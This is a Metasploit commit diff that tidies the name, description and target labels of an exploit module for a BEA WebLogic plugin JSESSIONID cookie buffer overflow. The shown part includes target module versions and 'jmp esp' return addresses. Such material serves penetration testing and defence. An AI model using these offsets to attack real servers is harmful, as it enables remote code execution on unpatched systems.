minor cleanups, removed 0day text, Fixes #573

git-svn-id: file:///home/svn/framework3/trunk@7646 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-30 18:42:00 +00:00 · 2009-11-30 18:42:00 +00:00 · ec45ea8c22
parent 16ae0112d1
commit ec45ea8c22
1 changed files with 6 additions and 4 deletions
--- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb
+++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb
@ -14,9 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote

 	def initialize(info = {})
 		super(update_info(info,	
-			'Name'           => 'BEA Weblogic JSESSIONID cookie value overflow',
+			'Name'           => 'BEA WebLogic JSESSIONID Cookie Value Overflow',
 			'Description'    => %q{
-				This module exploits a 0day in the JSESSION cookie value when clustering is configured.
+				This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable 
+			 code is only accessible when clustering is configured. A request containing a 
+			 long JSESSION cookie value can lead to arbirtary code execution.
 			},
 			'Author'         => 'pusscat',
 			'References'     =>
@ -39,12 +41,12 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Targets'        => 
 			[
-				[  'Windows Apache 2.2 - weblogic module version 1.0.1136334',
+				[  'Windows Apache 2.2 - WebLogic module version 1.0.1136334',
 					{
 					'Ret' => 0x1006c9b5,    # jmp esp
 					}
 				],
-				[  'Windows Apache 2.2 - weblogic module version 1.0.1150354',
+				[  'Windows Apache 2.2 - WebLogic module version 1.0.1150354',
 					{
 					'Ret' => 0x1006c9be,    # jmp esp
 					}